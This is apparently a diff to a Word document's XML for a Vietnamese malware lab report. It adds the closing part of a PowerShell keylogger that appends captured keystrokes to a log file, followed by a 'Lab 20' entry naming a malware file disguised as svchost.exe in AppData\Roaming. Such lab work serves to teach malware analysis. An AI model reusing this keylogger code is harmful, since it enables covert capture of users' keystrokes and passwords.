+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    # Success writing to log file</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    if ($success)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">                    {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                        # add key to logger file</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                        [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    finally</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        # Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>Lab 20:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>Mã độc: “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>C:\Users\hunter\AppData\Roaming\WPDNSE\svchost.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>”</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
